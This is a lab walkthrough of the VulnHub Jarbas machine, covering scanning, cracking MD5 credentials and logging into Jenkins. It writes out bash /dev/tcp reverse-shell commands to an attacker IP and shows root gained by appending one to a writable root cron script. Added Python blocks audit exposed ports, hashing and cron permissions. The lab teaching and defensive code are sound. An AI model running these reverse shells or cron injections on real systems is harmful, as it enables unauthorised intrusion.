
Jarbas

Posted: 2023-04-06 14:45:22  Views: 42
Tags: sbin http 239.132 00 192.168 Jarbas tcp

Jarbas

Address: https://www.vulnhub.com/entry/jarbas-1,232/

1. Host discovery

sudo nmap -sn 192.168.239.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 16:33 CST
Nmap scan report for 192.168.239.1
Host is up (0.00071s latency).
MAC Address: 00:50:56:C0:00:03 (VMware)
Nmap scan report for 192.168.239.132
Host is up (0.00063s latency).
MAC Address: 00:0C:29:34:B4:7F (VMware)
Nmap scan report for 192.168.239.254
Host is up (0.00010s latency).
MAC Address: 00:50:56:ED:A6:56 (VMware)
Nmap scan report for 192.168.239.129
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 28.01 seconds

2. Port scanning

  1. Scan all ports

     nmap --min-rate 10000 -p- 192.168.239.132           
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 16:35 CST
    Nmap scan report for 192.168.239.132
    Host is up (0.0011s latency).
    Not shown: 65531 closed tcp ports (reset)
    PORT     STATE SERVICE
    22/tcp   open  ssh
    80/tcp   open  http
    3306/tcp open  mysql
    8080/tcp open  http-proxy
    MAC Address: 00:0C:29:34:B4:7F (VMware)
    
    Nmap done: 1 IP address (1 host up) scanned in 17.11 seconds
    

    Scan again

    ┌──(de1te㉿de1te)-[~]
    └─$ sudo nmap --min-rate 10000 -p- 192.168.239.132
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 16:36 CST
    Nmap scan report for 192.168.239.132
    Host is up (0.000067s latency).
    Not shown: 65531 closed tcp ports (reset)
    PORT     STATE SERVICE
    22/tcp   open  ssh
    80/tcp   open  http
    3306/tcp open  mysql
    8080/tcp open  http-proxy
    MAC Address: 00:0C:29:34:B4:7F (VMware)
    
    Nmap done: 1 IP address (1 host up) scanned in 14.89 seconds
    

    Ports 22, 80, 3306 and 8080 are open

  2. Check the service versions on the open ports and the OS version

    sudo nmap -sT -sV -O -p 22,80,3306,8080 192.168.239.132
    
    Nmap scan report for 192.168.239.132
    Host is up (0.00040s latency).
    
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
    80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
    3306/tcp open  mysql   MariaDB (unauthorized)
    8080/tcp open  http    Jetty 9.4.z-SNAPSHOT
    MAC Address: 00:0C:29:34:B4:7F (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.2 - 4.9
    Network Distance: 1 hop
    
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 25.09 seconds
    
  3. Check for easy vulnerabilities

    sudo nmap --script=vuln -p 22,80,3306,8080 192.168.239.132
    
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 16:42 CST
    Nmap scan report for 192.168.239.132
    Host is up (0.00027s latency).
    
    PORT     STATE SERVICE
    22/tcp   open  ssh
    80/tcp   open  http
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    |_http-trace: TRACE is enabled
    |_http-csrf: Couldn't find any CSRF vulnerabilities.
    | http-enum: 
    |_  /icons/: Potentially interesting folder w/ directory listing
    3306/tcp open  mysql
    8080/tcp open  http-proxy
    | http-enum: 
    |_  /robots.txt: Robots file
    MAC Address: 00:0C:29:34:B4:7F (VMware)
    
    Nmap done: 1 IP address (1 host up) scanned in 38.03 seconds
    

    Port 8080 serves a robots.txt; let's see what is in it

    # we don't want robots to click "build" links
    User-agent: *
    Disallow: /
    

    Nothing useful

Summary: ports 80 and 8080 are open, so look at the web side first
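Recon output is easier to act on as structured findings than as raw terminal text. The following Python is an added example, not code from the original writeup: it parses the nmap service-scan and vuln-script lines shown above (embedded as a constructed copy) and applies an assumed exposure policy for a single web host, in which only SSH and the public web port are expected from the network and an enabled HTTP TRACE is reported. `EXPECTED_PORTS`, the function names and the policy itself are assumptions of this example.

```python
import re

# Constructed copy of the nmap -sV and --script=vuln lines shown above for 192.168.239.132.
NMAP_OUTPUT = """PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-trace: TRACE is enabled
| http-enum:
|_  /icons/: Potentially interesting folder w/ directory listing
3306/tcp open  mysql   MariaDB (unauthorized)
8080/tcp open  http    Jetty 9.4.z-SNAPSHOT
| http-enum:
|_  /robots.txt: Robots file
"""

# "80/tcp   open  http    Apache httpd ..." -> port, proto, state, service, version text
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")
# "|_http-trace: TRACE is enabled" -> script name, script result (nested "|_  /path: ..." lines are ignored)
SCRIPT_LINE = re.compile(r"^\|_?\s*([\w-]+):\s*(.*)$")


def parse_nmap(text):
    """Return open ports as dicts; NSE script result lines attach to the port printed just above them."""
    services, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = PORT_LINE.match(line)
        if m:
            current = None  # script lines after a closed/filtered port must not attach to an earlier one
            if m.group(3) == "open":
                current = {"port": int(m.group(1)), "proto": m.group(2), "service": m.group(4),
                           "version": m.group(5).strip(), "scripts": {}}
                services.append(current)
            continue
        s = SCRIPT_LINE.match(line)
        if s and current is not None:
            current["scripts"][s.group(1)] = s.group(2)
    return services


# Assumed policy for this host: only SSH and the public web port should be reachable from the network.
EXPECTED_PORTS = {22, 80}


def exposure_findings(services, expected=EXPECTED_PORTS):
    """Turn parsed services into findings a remediation ticket could be written from."""
    findings = []
    for s in services:
        label = f"{s['port']}/{s['proto']} {s['service']} {s['version']}".strip()
        if s["port"] not in expected:
            findings.append(f"{label}: listening on the network but not in the expected port set")
        if s["scripts"].get("http-trace", "").startswith("TRACE is enabled"):
            findings.append(f"{label}: HTTP TRACE enabled (Apache: TraceEnable off)")
    return findings


if __name__ == "__main__":
    for finding in exposure_findings(parse_nmap(NMAP_OUTPUT)):
        print("[!]", finding)
```

On this host the three findings map to straightforward fixes: bind MariaDB to localhost (`bind-address = 127.0.0.1` in the server config) unless remote clients genuinely need it, keep Jenkins on 8080 off the network edge (firewall rule or authenticated reverse proxy), and set `TraceEnable off` in the Apache configuration.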

3. Web

  1. Review the website

    Port 80:

    image

    Port 8080:

    image

    A login page. There are generally three ways to obtain a login account and password:

    • Default passwords
    • Information leaked on the site
    • Brute force
  2. Directory brute-forcing

    sudo gobuster dir -u 192.168.239.132 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt   
    
    Gobuster v3.5
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url:                     http://192.168.239.132
    [+] Method:                  GET
    [+] Threads:                 10
    [+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
    [+] Negative Status codes:   404
    [+] User Agent:              gobuster/3.5
    [+] Timeout:                 10s
    ===============================================================
    2023/03/27 17:00:06 Starting gobuster in directory enumeration mode
    ===============================================================
    Progress: 20023 / 62285 (32.15%)[ERROR] 2023/03/27 17:00:09 [!] parse "http://192.168.239.132/error\x1f_log": net/url: invalid control character in URL
    Progress: 61964 / 62285 (99.48%)
    ===============================================================
    2023/03/27 17:00:14 Finished
    ===============================================================
    

    Nothing there; try again with a few file extensions

    sudo gobuster dir -u 192.168.239.132 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x html,php
    
    ===============================================================
    Gobuster v3.5
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url:                     http://192.168.239.132
    [+] Method:                  GET
    [+] Threads:                 10
    [+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
    [+] Negative Status codes:   404
    [+] User Agent:              gobuster/3.5
    [+] Extensions:              html,php
    [+] Timeout:                 10s
    ===============================================================
    2023/03/27 17:01:30 Starting gobuster in directory enumeration mode
    ===============================================================
    /index.html           (Status: 200) [Size: 32808]
    /access.html          (Status: 200) [Size: 359]
    /.html                (Status: 403) [Size: 207]
    Progress: 66397 / 186855 (35.53%)[ERROR] 2023/03/27 17:01:39 [!] parse "http://192.168.239.132/besalu\t.html": net/url: invalid control character in URL
    [ERROR] 2023/03/27 17:01:39 [!] parse "http://192.168.239.132/besalu\t.php": net/url: invalid control character in URL
    Progress: 70235 / 186855 (37.59%)[ERROR] 2023/03/27 17:01:39 [!] parse "http://192.168.239.132/error\x1f_log": net/url: invalid control character in URL
    [ERROR] 2023/03/27 17:01:39 [!] parse "http://192.168.239.132/error\x1f_log.html": net/url: invalid control character in URL
    [ERROR] 2023/03/27 17:01:39 [!] parse "http://192.168.239.132/error\x1f_log.php": net/url: invalid control character in URL
    /.html                (Status: 403) [Size: 207]
    /index.html           (Status: 200) [Size: 32808]
    /.html                (Status: 403) [Size: 207]
    Progress: 183153 / 186855 (98.02%)
    ===============================================================
    2023/03/27 17:01:54 Finished
    ===============================================================
    

    There is an access.html page; take a look

    Creds encrypted in a safe way!
    
    tiago:5978a63b4654c73c60fa24f836386d87
    trindade:f463f63616cb3f1e81ce46b39f882fd5
    eder:9b38e2b1e8b12f426b0d208a7ab6cb98
    

    Hmm, the values after the colons look like MD5

    sudo hash-identifier '5978a63b4654c73c60fa24f836386d87'    
    
    Possible Hashs:
    [+] MD5
    [+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
    

    It is indeed MD5

    Look them up

    5978a63b4654c73c60fa24f836386d87:italia99
    9b38e2b1e8b12f426b0d208a7ab6cb98:vipsu
    f463f63616cb3f1e81ce46b39f882fd5:marianna
    

    Now we have the following information

    tiago : italia99
    trindade : vipsu
    eder : marianna
    
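access.html announces that the credentials are "encrypted in a safe way", but a bare 32-hex value is an unsalted MD5 digest, and the lookup above reversed all three in one step. The following Python is an added example, not code from the writeup: it parses the page's three entries, classifies them by length the way hash-identifier does, and contrasts that weak store with a salted PBKDF2 store in which two users who share a password still get different records. The record format, the `ITERATIONS` value and the function names are assumptions of this example.

```python
import hashlib
import hmac
import os
import re

# Constructed copy of the page's access.html body (the three hashed entries).
ACCESS_HTML = """Creds encrypted in a safe way!

tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98
"""

# Length-based guess, the same heuristic hash-identifier prints; a bare hex string carries no salt field.
DIGEST_FAMILY = {32: "md5/md4/ntlm family (128-bit, unsalted)",
                 40: "sha1 (160-bit, unsalted)",
                 64: "sha256 (256-bit, unsalted)"}


def parse_access_page(text):
    """Return (user, lowercase hex digest) pairs from lines shaped like user:hex."""
    pairs = []
    for line in text.splitlines():
        m = re.fullmatch(r"(\w+):([0-9a-fA-F]+)", line.strip())
        if m:
            pairs.append((m.group(1), m.group(2).lower()))
    return pairs


def classify(digest):
    return DIGEST_FAMILY.get(len(digest), "unknown")


def weak_store(password):
    """How access.html was built: one unsalted MD5 per password, so equal passwords give equal digests
    and a precomputed table answers the lookup instantly."""
    return hashlib.md5(password.encode()).hexdigest()


ITERATIONS = 600_000  # assumed work factor; tune so one hash costs roughly 100 ms on the target hardware


def hash_password(password, iterations=ITERATIONS):
    """Hardened store: random 16-byte salt + PBKDF2-HMAC-SHA256, serialised as algo$iters$salt$dk."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(stored, password):
    """Recompute with the stored salt and iteration count, then compare in constant time."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    for user, digest in parse_access_page(ACCESS_HTML):
        print(f"{user}: {classify(digest)}")
    # Two users with the same password: identical in the weak store, distinct in the hardened one.
    print("weak store collides:", weak_store("vipsu") == weak_store("vipsu"))
    print("salted store collides:", hash_password("vipsu") == hash_password("vipsu"))
```

The salt and iteration count travel inside the record, so the verifier needs no side table and the work factor can be raised later by re-hashing on the next successful login.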

    None of these work; try the other combinations

    eder / vipsu works
    

    Or brute-force it with a cluster bomb attack

    • burpsuite

      Result:

      image-20230327174323530

      eder---->vipsu

  3. Jenkins exploitation

    It should be this one: CVE-2019-10352

    Exploitation:

    image

    image

    image

    Reverse shell

    /bin/bash -i >& /dev/tcp/192.168.239.129/4444 0>&1
    

    Start the listener:

    sudo nc -lvnp 4444
    

    Reverse shell obtained

    bash-4.2$ ls
    

4. Privilege escalation

bash-4.2$ whoami  # current user
whoami
jenkins
bash-4.2$ uname -a   # kernel and OS version
uname -a 
Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
bash-4.2$ sudo -l   # sudo rights of the current user
sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

sudo: no tty present and no askpass program specified
bash-4.2$ cat /etc/passwd  # list all users
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:997:User for polkitd:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false

bash-4.2$ cat /etc/crontab  # check scheduled jobs
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1

# view the scheduled script
cat /etc/script/CleaningScript.sh
#!/bin/bash

rm -rf /var/log/httpd/access_log.txt


# check whether it is writable
echo '/bin/bash -i >& /dev/tcp/192.168.239.129/4443 0>&1' >>/etc/script/CleaningScript.sh

Success:

Listener on the attacker (left tmux pane):

┌──(de1te㉿de1te)-[~]
└─$ sudo nc -lvnp 4443
[sudo] de1te 的密码:
listening on [any] 4443 ...
connect to [192.168.239.129] from (UNKNOWN) [192.168.239.132] 33726
bash: no job control in this shell
[root@jarbas ~]#
[root@jarbas ~]# ls
ls
flag.txt
[root@jarbas ~]# cat flag.txt
cat flag.txt
Hey!

Congratulations! You got it! I always knew you could do it!
This challenge was very easy, huh? =)

Thanks for appreciating this machine.

@tiagotvrs
[root@jarbas ~]#

Attacker address check (right tmux pane):

┌──(de1te㉿de1te)-[~]
└─$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:4c:a6:2d brd ff:ff:ff:ff:ff:ff
    inet 192.168.239.129/24 brd 192.168.239.255 scope global dynamic noprefixroute eth0
       valid_lft 903sec preferred_lft 903sec
    inet6 fe80::20c:29ff:fe4c:a62d/64 scope link noprefixroute
       valid_lft forever preferred_lft forever

┌──(de1te㉿de1te)-[~]
└─$
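The root cause of this escalation is a root cron job whose script the jenkins user could modify. The following Python is an added example, not code from the writeup: it is the check a host audit would run. It parses /etc/crontab entries (a constructed copy of the page's line is included) and, for each root job with an absolute script path, reports whether the file is a symlink, is owned by someone other than the trusted uid, is group/world writable, or sits in a world-writable directory without the sticky bit. For the demo it builds a throwaway directory with a mode-0777 CleaningScript.sh beside a correctly permissioned script; that 0777 mode is an assumption for the demo, since the page never shows the real mode. `trusted_uid` and the function names are assumptions of this example.

```python
import os
import stat
import tempfile

# Constructed copy of the relevant /etc/crontab lines from the page.
PAGE_CRONTAB = """SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# *  *  *  *  * user-name  command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
"""


def parse_crontab(text):
    """Return (user, command) pairs from system-crontab lines: five time fields, then user, then command."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        fields = line.split(None, 6)
        if len(fields) == 7:  # @reboot-style shortcuts have a different shape and are skipped here
            entries.append((fields[5], fields[6]))
    return entries


def tamper_reason(path, trusted_uid=0):
    """Why a user other than the trusted owner could change what root executes at `path`, or None."""
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return "target does not exist (whoever can create it decides what root runs)"
    if stat.S_ISLNK(st.st_mode):
        return "target is a symlink (its owner can repoint it)"
    if st.st_uid != trusted_uid:
        return f"owned by uid {st.st_uid}, not the trusted uid {trusted_uid}"
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return f"group/world writable ({stat.filemode(st.st_mode)})"
    parent = os.stat(os.path.dirname(path) or "/")
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        return "parent directory is world writable without the sticky bit (file can be replaced)"
    return None


def audit_crontab(text, trusted_uid=0):
    """Flag root jobs whose absolute script path a non-trusted user could modify."""
    findings = []
    for user, command in parse_crontab(text):
        target = command.split()[0]
        if user == "root" and target.startswith("/"):  # relative names resolve via PATH; out of scope here
            reason = tamper_reason(target, trusted_uid)
            if reason:
                findings.append((target, reason))
    return findings


def build_sandbox():
    """Constructed demo tree: CleaningScript.sh with the weak mode 0777 next to a correctly locked-down script.
    Returns crontab text pointing at both; the scripts are only inspected, never executed."""
    script_dir = os.path.join(tempfile.mkdtemp(), "script")
    os.mkdir(script_dir, 0o755)
    loose = os.path.join(script_dir, "CleaningScript.sh")
    tight = os.path.join(script_dir, "rotate.sh")
    for path in (loose, tight):
        with open(path, "w") as f:
            f.write("#!/bin/bash\nrm -rf /var/log/httpd/access_log.txt\n")  # body shown on the page
    os.chmod(loose, 0o777)  # the weak setting
    os.chmod(tight, 0o755)  # the corrected setting
    return f"*/5 * * * * root {loose} >/dev/null 2>&1\n0 3 * * * root {tight}\n"


def demo_findings():
    # trusted_uid is the sandbox owner so the demo behaves the same whether or not it runs as root
    return audit_crontab(build_sandbox(), trusted_uid=os.getuid())


if __name__ == "__main__":
    for target, reason in demo_findings():
        print(f"[!] root cron job {target}: {reason}")
```

On a real host run `audit_crontab(open("/etc/crontab").read())` as root with the default `trusted_uid=0`, and extend the same loop over /etc/cron.d and the per-user crontabs. The fix for the finding is the usual one: root:root ownership and a mode without group/other write (0755 or 0744) on the script and on the directory that holds it.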

From: https://www.cnblogs.com/nsqaq/p/17292660.html
